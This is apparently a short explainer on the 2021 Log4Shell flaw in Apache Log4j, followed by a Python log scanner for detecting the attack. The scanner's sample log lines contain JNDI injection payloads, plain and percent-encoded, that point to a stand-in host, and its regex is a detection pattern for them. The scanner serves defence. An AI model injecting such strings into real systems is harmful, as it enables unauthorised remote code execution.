CVE-2021-44228 | CVSS 10.0 | 2021-12-09
Log4Shell
How one log line owned the internet.
A string like ${jndi:ldap://…} inside any value logged by Apache Log4j 2.x caused the JVM to fetch and execute code from an attacker-controlled LDAP server. Remote code execution. No authentication. Logging the string was enough.
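Because logging the string was the trigger, the string itself ends up in whatever was logged, which makes logs the first place to look. The following is an added example, not part of the original page: it scans access-log lines for plain and percent-encoded JNDI lookups. The function names, the sample lines and the `callback.example` host are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Start of a JNDI lookup; captures the scheme and the host part of the URL.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]*)", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly: proxies and apps may encode a value more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_lookups(line):
    """Return (scheme, host) for every JNDI lookup string found in one log line."""
    return [(m.group(1).lower(), m.group(2))
            for m in JNDI_RE.finditer(decode_fully(line))]

def scan(lines):
    """Return {line_number: [(scheme, host), ...]} for lines that contain a lookup."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = find_jndi_lookups(line)
        if found:
            hits[n] = found
    return hits

# Constructed access-log lines (not real traffic): documentation IP ranges, example host.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:12:44 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"',
    '203.0.113.9 - - [10/Dec/2021:03:13:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:13:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:13:09 +0000] "GET /?q=%2524%257BJNDI%253Aldap%253A%252F%252Fcallback.example%252Fa%257D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(f"line {n}: {found}")
```

A hit shows that the string reached a log, not that the host was running a vulnerable Log4j version. The pattern covers only the plain and percent-encoded forms, so treat an empty result as inconclusive.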
T+0 | PUBLIC
Disclosure hits Twitter
December 9, 2021 — a researcher publishes a proof-of-concept showing that Minecraft chat messages can execute code on the server. Within an hour the scope expands: anything that logs user input via Log4j is vulnerable. Tomcat. Elasticsearch. Steam. iCloud. Tesla. You.
Disclosure lands. The whole internet is suddenly a target list.